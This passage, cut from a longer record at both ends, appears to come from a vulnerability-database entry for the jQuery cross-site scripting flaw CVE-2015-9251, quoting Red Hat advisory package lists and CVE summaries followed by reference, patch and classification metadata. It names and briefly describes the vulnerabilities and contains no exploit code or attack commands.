17d.src.rpm\n\naarch64:\nbind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.aarch64.rpm\nbind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.aarch64.rpm\nbind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.aarch64.rpm\nipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm\nipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm\nipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm\nipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm\nipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm\nipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm\nipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nopendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.aarch64.rpm\nopendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.aarch64.rpm\nopendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.aarch64.rpm\nslapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nslapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nslapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.aarch64.rpm\nsofthsm-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm\nsofthsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm\nsofthsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm\nsofthsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm\n\nnoarch:\ncustodia-0.6.0-3.module+el8.1.0+4098+f286395e.noarch.rpm\nipa-client-common-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\nipa-client-common-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm\nipa-common-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\nipa-common-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm\nipa-healthcheck-0.4-6.module+el8.3.0+7710+e2408ce4.noarch.rpm\nipa-healthcheck-core-0.4-6.module+el8.3.0+7710+e2408ce4.noarch.rpm\nipa-healthcheck-core-0.4-6.module+el8.3.0+7711+c4441980.noarch.rpm\nipa-python-compat-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\nipa-python-compat-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm\nipa-selinux-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\nipa-selinux-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm\nipa-server-common-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\nipa-server-dns-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\npython3-custodia-0.6.0-3.module+el8.1.0+4098+f286395e.noarch.rpm\npython3-ipaclient-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\npython3-ipaclient-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm\npython3-ipalib-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\npython3-ipalib-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm\npython3-ipaserver-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm\npython3-jwcrypto-0.5.0-1.module+el8.1.0+4098+f286395e.noarch.rpm\npython3-jwcrypto-0.5.0-1.module+el8.1.0+4107+4a66eb87.noarch.rpm\npython3-kdcproxy-0.4-5.module+el8.2.0+4691+a05b2456.noarch.rpm\npython3-pyusb-1.0.0-9.module+el8.1.0+4098+f286395e.noarch.rpm\npython3-pyusb-1.0.0-9.module+el8.1.0+4107+4a66eb87.noarch.rpm\npython3-qrcode-5.1-12.module+el8.1.0+4098+f286395e.noarch.rpm\npython3-qrcode-5.1-12.module+el8.1.0+4107+4a66eb87.noarch.rpm\npython3-qrcode-core-5.1-12.module+el8.1.0+4098+f286395e.noarch.rpm\npython3-qrcode-core-5.1-12.module+el8.1.0+4107+4a66eb87.noarch.rpm\npython3-yubico-1.3.2-9.module+el8.1.0+4098+f286395e.noarch.rpm\npython3-yubico-1.3.2-9.module+el8.1.0+4107+4a66eb87.noarch.rpm\n\nppc64le:\nbind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.ppc64le.rpm\nbind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.ppc64le.rpm\nbind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.ppc64le.rpm\nipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm\nipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm\nipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm\nipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm\nipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm\nipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm\nipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nopendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.ppc64le.rpm\nopendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.ppc64le.rpm\nopendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.ppc64le.rpm\nslapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nslapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nslapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.ppc64le.rpm\nsofthsm-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm\nsofthsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm\nsofthsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm\nsofthsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm\n\ns390x:\nbind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.s390x.rpm\nbind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.s390x.rpm\nbind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.s390x.rpm\nipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm\nipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm\nipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm\nipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm\nipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm\nipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm\nipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm\nopendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.s390x.rpm\nopendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.s390x.rpm\nopendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.s390x.rpm\nslapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.s390x.rpm\nslapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.s390x.rpm\nslapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.s390x.rpm\nsofthsm-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm\nsofthsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm\nsofthsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm\nsofthsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm\n\nx86_64:\nbind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.x86_64.rpm\nbind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.x86_64.rpm\nbind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.x86_64.rpm\nipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm\nipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm\nipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm\nipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm\nipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm\nipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm\nipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nopendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.x86_64.rpm\nopendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.x86_64.rpm\nopendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.x86_64.rpm\nslapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nslapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nslapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.x86_64.rpm\nsofthsm-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm\nsofthsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm\nsofthsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm\nsofthsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-9251\nhttps://access.redhat.com/security/cve/CVE-2016-10735\nhttps://access.redhat.com/security/cve/CVE-2018-14040\nhttps://access.redhat.com/security/cve/CVE-2018-14042\nhttps://access.redhat.com/security/cve/CVE-2018-20676\nhttps://access.redhat.com/security/cve/CVE-2018-20677\nhttps://access.redhat.com/security/cve/CVE-2019-8331\nhttps://access.redhat.com/security/cve/CVE-2019-11358\nhttps://access.redhat.com/security/cve/CVE-2020-1722\nhttps://access.redhat.com/security/cve/CVE-2020-11022\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/\n\n8. Contact:\n\nThe Red Hat security contact is <secalert@redhat.com>. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBX6I0xtzjgjWX9erEAQioFw/+IiVoE8tPMkiNgSNrk05OezzG/Cev8wXY\nmTJ+clSxujruzDZ1GyYz5Ua5v4+fwEHbTKVHiite3HKbYGgV9E5H9Y/JVR75rbPN\nmIfAOLmvYDp3JeHT3RBqRrtviz2UaWRTmE8E30EoC0C912w0NHpwS3fhuRmJov1X\nlflTtWlQCuPE/7yFQEZqYYjmKMqAVeDk4K6smM/aTzMyM+uFgaksiSTrLzU0mcHJ\nAAn9h59qlwUXNGRbyBCoLMJrKq5Sw1+xz518XIIjJOQDJbSqu8syzKgi/qSFuLRp\n2c/OSKJ98CVoiCcyhsBW/c3B6eoDmSfeKqt6JwVH/Sva+d7Oj5vpWTB5GW4hDFFh\nt3cuhvyavPnyAzxRnYw5syn/RTyjaOK1U6+6SbEtJVnlx9+FW0lKs/Pcx2ocYmfO\nUCDXHgxmEP8DTKwJZyIZtybVkpqbXh6jf69NLROTTZMtEwJzE1NGG4ulcl6tutTq\nS0gchuiUuxItZlD3a9ISBXXxV0iqqd7I5p78maohzIwfyZR13S++rFt7JnoVb7SO\nDECfEs6VinGH0Z0YInceF6Y9N+SURBrcQpQK12/wtGSChFFU83FII2sxy6iG7pTF\nHPTzByu+aYgFpuEF4EKSrDlZCVJ8Es5lyp+cF401o3oGJuNo9WYScKjb51a0+SLJ\nzbmM3GoiGZI=QyyK\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \nThe purpose of this text-only errata is to inform you about the security\nissues fixed in this release. \n\nSecurity Fix(es):\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using PRIORITY frames results in excessive resource\nconsumption (CVE-2019-9513)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth\n(CVE-2019-9514)\n\n* HTTP/2: flood using SETTINGS frames results in unbounded memory growth\n(CVE-2019-9515)\n\n* HTTP/2: 0-length headers lead to denial of service (CVE-2019-9516)\n\n* HTTP/2: request for large response leads to denial of service\n(CVE-2019-9517)\n\n* HTTP/2: flood using empty frames results in excessive resource\nconsumption (CVE-2019-9518)\n\n* infinispan: invokeAccessibly method from ReflectionUtil class allows to\ninvoke private methods (CVE-2019-10174)\n\n* spring-security-core: mishandling of user passwords allows logging in\nwith a password of NULL (CVE-2019-11272)\n\n* jackson-databind: failure to block the logback-core class from\npolymorphic deserialization leading to remote code execution\n(CVE-2019-12384)\n\n* jackson-databind: default typing mishandling leading to remote code\nexecution (CVE-2019-14379)\n\n* xmlrpc: Deserialization of server-side exception from faultCause in\nXMLRPC error response (CVE-2019-17570)\n\n* js-jquery: Cross-site scripting via cross-domain ajax requests\n(CVE-2015-9251)\n\n* logback: Serialization vulnerability in SocketServer and\nServerSocketReceiver (CVE-2017-5929)\n\n* js-jquery: XSS in responses from cross-origin ajax requests\n(CVE-2017-16012)\n\n* apache-commons-compress: ZipArchiveInputStream.read() fails to identify\ncorrect EOF allowing for DoS via crafted zip (CVE-2018-11771)\n\n* spring-data-api: potential information disclosure through maliciously\ncrafted example value in ExampleMatcher (CVE-2019-3802)\n\n* undertow: leak credentials to log files\nUndertowLogger.REQUEST_LOGGER.undertowRequestFailed (CVE-2019-3888)\n\n* shiro: Cookie padding oracle vulnerability with default configuration\n(CVE-2019-12422)\n\n* jackson-databind: polymorphic typing issue allows attacker to read\narbitrary local files on the server via crafted JSON message. \n1725807 - CVE-2019-12384 jackson-databind: failure to block the logback-core class from polymorphic deserialization leading to remote code execution\n1728993 - CVE-2019-11272 spring-security-core: mishandling of user passwords allows logging in with a password of NULL\n1730316 - CVE-2019-3802 spring-data-api: potential information disclosure through maliciously crafted example value in ExampleMatcher\n1735645 - CVE-2019-9512 HTTP/2: flood using PING frames results in unbounded memory growth\n1735741 - CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption\n1735744 - CVE-2019-9514 HTTP/2: flood using HEADERS frames results in unbounded memory growth\n1735745 - CVE-2019-9515 HTTP/2: flood using SETTINGS frames results in unbounded memory growth\n1735749 - CVE-2019-9518 HTTP/2: flood using empty frames results in excessive resource consumption\n1737517 - CVE-2019-14379 jackson-databind: default typing mishandling leading to remote code execution\n1741864 - CVE-2019-9516 HTTP/2: 0-length headers lead to denial of service\n1741868 - CVE-2019-9517 HTTP/2: request for large response leads to denial of service\n1752962 - CVE-2019-14439 jackson-databind: Polymorphic typing issue related to logback/JNDI\n1774726 - CVE-2019-12422 shiro: Cookie padding oracle vulnerability with default configuration\n1775193 - CVE-2019-17570 xmlrpc: Deserialization of server-side exception from faultCause in XMLRPC error response\n\n5", sources: [ { db: "NVD", id: "CVE-2015-9251", }, { db: "JVNDB", id: "JVNDB-2015-008097", }, { db: "BID", id: "105658", }, { db: "VULHUB", id: "VHN-87212", }, { db: "PACKETSTORM", id: "170819", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "156315", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "156941", }, ], trust: 2.43, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2015-9251", trust: 3.3, }, { db: "ICS CERT", id: "ICSA-18-212-04", trust: 2.8, }, { db: "BID", id: "105658", trust: 2, }, { db: "PACKETSTORM", id: "153237", trust: 1.7, }, { db: "PACKETSTORM", id: "156743", trust: 1.7, }, { db: "PACKETSTORM", id: "152787", trust: 1.7, }, { db: "TENABLE", id: "TNS-2019-08", trust: 1.7, }, { db: "PULSESECURE", id: "SA44601", trust: 1.7, }, { db: "PACKETSTORM", id: "156315", trust: 0.8, }, { db: "PACKETSTORM", id: "170823", trust: 0.8, }, { db: "PACKETSTORM", id: "156941", trust: 0.8, }, { db: "JVN", id: "JVNVU96012689", trust: 0.8, }, { db: "JVNDB", id: "JVNDB-2015-008097", trust: 0.8, }, { db: "PACKETSTORM", id: "159353", trust: 0.7, }, { db: "PACKETSTORM", id: "159852", trust: 0.7, }, { db: "PACKETSTORM", id: "170821", trust: 0.7, }, { db: "PACKETSTORM", id: "156630", trust: 0.7, }, { db: "CNNVD", id: "CNNVD-201801-798", trust: 0.7, }, { db: "AUSCERT", id: "ESB-2020.1016", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.0832", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2023.0585", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.3165", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.3875", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.1238", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2023.0583", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.0494", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2022.1512", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2021.1519", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.3267", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.1299", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.1076", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2021.0465", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.3902", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.4294", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.3368", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.1225", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2021.2525", trust: 0.6, }, { db: "ICS CERT", id: "ICSMA-21-187-01", trust: 0.6, }, { db: "ICS CERT", id: "ICSA-22-097-01", trust: 0.6, }, { db: "PACKETSTORM", id: "170819", trust: 0.2, }, { db: "PACKETSTORM", id: "159876", trust: 0.2, }, { db: "PACKETSTORM", id: "170817", trust: 0.1, }, { db: "SEEBUG", id: "SSVID-98926", trust: 0.1, }, { db: "VULHUB", id: "VHN-87212", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-87212", }, { db: "BID", id: "105658", }, { db: "JVNDB", id: "JVNDB-2015-008097", }, { db: "PACKETSTORM", id: "170819", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "156315", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "156941", }, { db: "CNNVD", id: "CNNVD-201801-798", }, { db: "NVD", id: "CVE-2015-9251", }, ], }, id: "VAR-201801-0036", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-87212", }, ], trust: 0.01, }, last_update_date: "2024-11-29T22:33:43.707000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Mitigate possible XSS vulnerability #2588 (c254d30)", trust: 0.8, url: "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc", }, { title: "jQuery Fixes for cross-site scripting vulnerabilities", trust: 0.6, url: "http://123.124.177.30/web/xxk/bdxqById.tag?id=77976", }, ], sources: [ { db: "JVNDB", id: "JVNDB-2015-008097", }, { db: "CNNVD", id: "CNNVD-201801-798", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-79", trust: 1.1, }, { problemtype: "Cross-site scripting (CWE-79) [NVD Evaluation ]", trust: 0.8, }, ], sources: [ { db: "VULHUB", id: "VHN-87212", }, { db: "JVNDB", id: "JVNDB-2015-008097", }, { db: "NVD", id: "CVE-2015-9251", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.9, url: "http://www.securityfocus.com/bid/105658", }, { trust: 2.9, url: "http://packetstormsecurity.com/files/152787/dotcms-5.1.1-vulnerable-dependencies.html", }, { trust: 2.6, url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { trust: 2.4, url: "https://access.redhat.com/errata/rhsa-2020:0481", }, { trust: 2.3, url: "http://packetstormsecurity.com/files/153237/retirejs-cors-issue-script-execution.html", }, { trust: 2.3, url: "http://packetstormsecurity.com/files/156743/octobercms-insecure-dependencies.html", }, { trust: 2.3, url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { trust: 2, url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { trust: 2, url: "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc", }, { trust: 2, url: "https://github.com/jquery/jquery/pull/2588", }, { trust: 2, url: "https://ics-cert.us-cert.gov/advisories/icsa-18-212-04", }, { trust: 2, url: "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/securitybulletin_lfsec126.pdf", }, { trust: 2, url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { trust: 2, url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { trust: 1.7, url: "https://seclists.org/bugtraq/2019/may/18", }, { trust: 1.7, url: "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa44601", }, { trust: 1.7, url: "https://security.netapp.com/advisory/ntap-20210108-0004/", }, { trust: 1.7, url: "https://www.tenable.com/security/tns-2019-08", }, { trust: 1.7, url: "http://seclists.org/fulldisclosure/2019/may/13", }, { trust: 1.7, url: "http://seclists.org/fulldisclosure/2019/may/11", }, { trust: 1.7, url: "http://seclists.org/fulldisclosure/2019/may/10", }, { trust: 1.7, url: "https://github.com/jquery/jquery/issues/2432", }, { trust: 1.7, url: "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2", }, { trust: 1.7, url: "https://snyk.io/vuln/npm:jquery:20150627", }, { trust: 1.7, url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { trust: 1.7, url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { trust: 1.7, url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { trust: 1.7, url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { trust: 1.7, url: "https://access.redhat.com/errata/rhsa-2020:0729", }, { trust: 1.7, url: "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html", }, { trust: 1.3, url: "https://nvd.nist.gov/vuln/detail/cve-2015-9251", }, { trust: 1, url: "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731%40%3cdev.flink.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3cissues.drill.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3cdev.drill.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2%40%3cuser.flink.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49%40%3cuser.flink.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3ccommits.roller.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3cdev.drill.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854%40%3cuser.flink.apache.org%3e", }, { trust: 0.9, url: "https://jquery.org/", }, { trust: 0.8, url: "https://jvn.jp/vu/jvnvu96012689/", }, { trust: 0.8, url: "https://www.us-cert.gov/ics/advisories/icsa-18-212-04", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3cdev.drill.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3cdev.drill.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3cissues.drill.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731@%3cdev.flink.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854@%3cuser.flink.apache.org%3e", }, { trust: 0.7, url: 